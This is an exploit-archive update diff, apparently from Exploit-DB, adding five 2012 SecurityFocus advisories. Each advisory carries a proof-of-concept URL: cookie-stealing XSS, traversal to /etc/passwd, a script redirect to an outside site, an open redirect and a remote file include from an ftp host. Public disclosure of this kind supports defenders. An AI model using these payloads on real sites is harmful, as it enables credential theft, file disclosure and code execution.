DB: 2015-08-24

5 new exploits

files.csv

@@ -34082,6 +34082,7 @@ id,file,description,date,author,platform,type,port
 37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0
 37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37755,platforms/windows/local/37755.c,"Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0
+37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability",2012-03-12,K1P0D,multiple,remote,0
 37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0
 37758,platforms/win32/shellcode/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ (199 Bytes Null-Free)",2015-08-12,noviceflux,win32,shellcode,0
 37759,platforms/linux/dos/37759.py,"NeuroServer 0.7.4 - (EEG TCP/IP Transceiver) Remote DoS",2015-08-12,nitr0us,linux,dos,0
@@ -34124,6 +34125,10 @@ id,file,description,date,author,platform,type,port
 37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS cat2.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
 37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS special.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
 37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
+37943,platforms/php/webapps/37943.txt,"WebTitan 'logs-x.php' Directory Traversal Vulnerability",2012-10-20,"Richard Conner",php,webapps,0
+37944,platforms/php/webapps/37944.txt,"vBSEO 'u' parameter Cross Site Scripting Vulnerability",2012-06-16,MegaMan,php,webapps,0
+37945,platforms/php/webapps/37945.txt,"SilverStripe 2.4.x 'BackURL' Parameter URI Redirection Vulnerability",2012-10-15,"Aung Khant",php,webapps,0
+37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Include Vulnerabilities",2012-10-15,"Charlie Eriksen",php,webapps,0
 37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - .pls Local Crash PoC",2015-08-17,St0rn,windows,dos,0
 37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH bypass)",2015-08-17,St0rn,windows,local,0
 37800,platforms/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",windows,remote,0

platforms/multiple/remote/37947.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55946/info
+
+LiteSpeed Web Server is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+LiteSpeed Web Server 4.1.11 and prior versions are vulnerable. 
+
+http://www.exxample.com/service/graph_html.php?gtitle=VHOSTa%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 

platforms/php/webapps/37943.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55904/info
+
+WebTitan is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files containing sensitive information that could aid in further attacks.
+
+WebTitan Versions prior to 3.60 are vulnerable. 
+
+http://www.example.com//logs-x.php? jaction=view&fname=../../../../../etc/passwd 

platforms/php/webapps/37944.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/55908/info
+
+vBSEO is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+vBSEO 3.8.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/forums/member.php?tab=friends&u=11411%22%3E%3Cscript%3Ewindow.location%20=%20%22http://www.internot.info/forum/%22%20%3C/script%3E
+
+http://www.example.com/forum/member.php?u=1%22%3E%3Cscript%3Ewindow.location%20=%20%22http://www.internot.info/forum/%22%20%3C/script%3E 

platforms/php/webapps/37945.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55915/info
+
+SilverStripe is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+SilverStripe 2.4.7 and prior are vulnerable. 
+
+http://www.example.com/index.php/Security/login?BackURL=http://example1.com 

platforms/php/webapps/37946.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55919/info
+
+The Crayon Syntax Highlighter plug-in for WordPress is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues may allow a remote attacker to obtain sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+Crayon Syntax Highlighter 1.12.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=ftp://192.168.80.201/wp-load.php